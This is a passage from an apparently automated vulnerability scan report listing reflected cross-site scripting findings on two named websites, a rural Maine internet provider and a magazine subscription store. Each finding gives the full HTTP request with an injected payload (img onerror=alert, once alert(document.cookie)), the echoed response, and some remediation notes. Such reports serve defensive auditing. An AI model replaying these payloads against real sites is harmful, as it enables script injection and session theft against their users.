<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ContactUs516ec<img src=a onerror=alert(1)>286ed71c31f</h2>
...[SNIP]...

3.20. http://www.ccmaine.net/HomePage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /HomePage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d was submitted in the REST URL parameter 1. This input was echoed as f982c<img src=a onerror=alert(1)>75affe6a42d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePagef982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:11 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0909425b1db91ebe3d20340a0cd3ebf6
Content-Length: 3261
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : HomePagef982c<img src=a onerror=alert(1)>75affe6a42d</h2>
...[SNIP]...

3.21. http://www.ccmaine.net/HomePage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /HomePage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 was submitted in the REST URL parameter 1. This input was echoed as 47337"><img src=a onerror=alert(1)>61bf246dcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePage47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:03 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: dc98c484eb8016411a263012303b03fc
Content-Length: 3273
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for HomePage47337"><img src=a onerror=alert(1)>61bf246dcf4 (RSS)" href="http://www.ccmaine.net/HomePage47337">
...[SNIP]...

3.22. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 was submitted in the REST URL parameter 1. This input was echoed as f1d93<img src=a onerror=alert(1)>1e652f7eb00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceAreaf1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0f44546dae010234136c69ab529c529c
Content-Length: 3280
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ServiceAreaf1d93<img src=a onerror=alert(1)>1e652f7eb00</h2>
...[SNIP]...

3.23. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 was submitted in the REST URL parameter 1. This input was echoed as 5a14d"><img src=a onerror=alert(1)>5bb3ad33910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceArea5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 01a1cb204eb68f3b229258b88c224a64
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceArea5a14d"><img src=a onerror=alert(1)>5bb3ad33910 (RSS)" href="http://www.ccmaine.net/ServiceArea5a14d">
...[SNIP]...

3.24. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceOfferings

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 was submitted in the REST URL parameter 1. This input was echoed as 7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferings7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: f5be6b6022b0df8893fa7c3238f292fd
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceOfferings7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 (RSS)" href="http://www.ccmaine.net/ServiceOfferings7b9d5">
...[SNIP]...

3.25. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ServiceOfferings

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 was submitted in the REST URL parameter 1. This input was echoed as bd4b3<img src=a onerror=alert(1)>eeb57d3c8a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferingsbd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:00 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d9dd2b24ab396a9cd51f93f9de07b1c6
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : ServiceOfferingsbd4b3<img src=a onerror=alert(1)>eeb57d3c8a0</h2>
...[SNIP]...

3.26. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 was submitted in the REST URL parameter 1. This input was echoed as 2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:12 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: db4dc8c62428cdbb8e1c673cb517b83c
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for TechnicalSupport2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 (RSS)" href="http://www.ccmaine.net/TechnicalSupport2dcb9">
...[SNIP]...

3.27. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d was submitted in the REST URL parameter 1. This input was echoed as 976ce<img src=a onerror=alert(1)>04d929e646d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:07 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0feacbd9d3e1a0356e8dce1009bba5c4
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : TechnicalSupport976ce<img src=a onerror=alert(1)>04d929e646d</h2>
...[SNIP]...

3.28. http://www.ccmaine.net/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc was submitted in the REST URL parameter 1. This input was echoed as 39a81"><img src=a onerror=alert(1)>a60931266fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:39 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 1bc6aa6f9451703197fd700f13b535a0
Content-Length: 3231
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for a39a81"><img src=a onerror=alert(1)>a60931266fc (RSS)" href="http://www.ccmaine.net/a39a81">
...[SNIP]...

3.29. http://www.ccmaine.net/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 was submitted in the REST URL parameter 1. This input was echoed as 5c9b5<img src=a onerror=alert(1)>90bd250c825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:57 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25c719ece4c4994f0429bcc010b9f443
Content-Length: 3219
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : a5c9b5<img src=a onerror=alert(1)>90bd250c825</h2>
...[SNIP]...

3.30. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5a5e0--><a%20b%3dc>29f0394fc82 was submitted in the REST URL parameter 5. This input was echoed as 5a5e0--><a b=c>29f0394fc82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5a5e0--><a%20b%3dc>29f0394fc82 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:56 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ZJVVhrC3GuPc1UAALNDHphW:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:47 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5a5e0--><a b=c>29f0394fc82".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.31. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload c74af--><a%20b%3dc>3f1a901681d was submitted in the REST URL parameter 5. This input was echoed as c74af--><a b=c>3f1a901681d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/c74af--><a%20b%3dc>3f1a901681d HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:09 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EvQrtGaQnseDQXSXsw3brvD:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:00 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "c74af--><a b=c>3f1a901681d".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.32. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5aab9--><a%20b%3dc>ec3af74862e was submitted in the REST URL parameter 5. This input was echoed as 5aab9--><a b=c>ec3af74862e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5aab9--><a%20b%3dc>ec3af74862e HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:19 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Hd4iE0_k4lcDWx9pjCSs5NG:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:12 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5aab9--><a b=c>ec3af74862e".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.33. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload f6bac--><a%20b%3dc>5d7fa6913fa was submitted in the REST URL parameter 5. This input was echoed as f6bac--><a b=c>5d7fa6913fa in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/f6bac--><a%20b%3dc>5d7fa6913fa HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:53 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
